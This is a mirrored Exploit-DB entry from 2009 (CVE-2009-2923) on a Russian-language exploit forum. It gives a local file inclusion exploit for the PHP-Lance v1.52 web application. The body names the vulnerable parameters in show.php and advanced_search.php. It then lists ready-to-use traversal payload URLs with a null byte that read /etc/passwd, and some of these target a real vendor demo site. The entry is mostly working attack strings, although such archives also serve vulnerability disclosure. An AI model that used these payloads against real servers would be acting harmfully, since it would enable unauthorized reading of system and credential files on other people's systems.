- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9444
- Проверка EDB
-
- Пройдено
- Автор
- JETLI007
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2923
- Дата публикации
- 2009-08-18
Код:
#############################
Name : PHP-Lance v1.52
price US $349.95 :p
Demo : http://www.scriptdemo.com/php-lance/
#############################
------------------------------------------------------------------------
_________________________________
|Author : jetli007
|alkhari9007[AT]gmail[DOT]com
|www.vxx9.cc
|Thx&Greets to: 5D;taishi;dr.php;!bad boy!;psycho;ABK;reno
________________________________
-------------------------------------------------------------------------
PoC's:
- http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
- http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
- http:// 127.0.0.1 / [path] /advanced_search.php?in=[LFI]
LiveDemo:
- http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00
- http://www.scriptdemo.com/php-lance/show.php?catid=5&sch=yellow&language=../../../../../../../../../../../../../etc/passwd%00
- http://www.scriptdemo.com/php-lance/advanced_search.php?in=../../../../../../../../../../../../../etc/passwd%00
-------------------------------------------------------------------------
# milw0rm.com [2009-08-18]- Источник
- www.exploit-db.com
